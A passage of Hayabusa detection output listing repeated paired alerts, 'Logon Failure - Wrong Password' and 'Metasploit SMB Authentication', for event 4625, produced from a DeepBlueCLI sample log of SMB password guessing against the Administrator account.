NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
